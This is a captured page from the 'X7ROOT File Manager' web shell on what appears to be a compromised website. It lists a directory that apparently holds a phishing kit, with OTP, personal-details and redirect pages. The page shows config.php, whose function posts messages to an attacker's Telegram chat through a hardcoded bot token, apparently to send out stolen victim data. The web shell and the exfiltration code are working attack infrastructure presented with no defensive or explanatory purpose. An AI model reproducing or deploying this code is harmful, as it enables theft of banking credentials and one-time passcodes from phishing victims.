X7ROOT File Manager
Current Path:
/home/seodomino/public_html/old/lgbpxrmh/affinity-access
home
/
seodomino
/
public_html
/
old
/
lgbpxrmh
/
affinity-access
/
📁
..
📁
BOTS
📄
c.html
(7.42 KB)
📄
config.php
(690 B)
📁
css
📁
file
📁
images
📄
index2.html
(10.23 KB)
📄
otp.html
(7.08 KB)
📄
otp2.html
(7.26 KB)
📄
personal.html
(8.23 KB)
📄
redirect.php
(736 B)
📄
ss.html
(10.06 KB)
Editing: config.php
<?php function send_telegram_msg($message){ // Put Your Telegram Information Here $botToken = '5879310390:AAHZcKSfKDaUNxADsW-eKehj7NXBrdv0ZOE'; $chat_id = ['5172716647']; $website="https://api.telegram.org/bot".$botToken; foreach($chat_id as $ch){ $params=[ 'chat_id'=>$ch, 'text'=>$message, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 3); curl_setopt($ch, CURLOPT_POST, 3); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } return true; } ?>
Upload File
Create Folder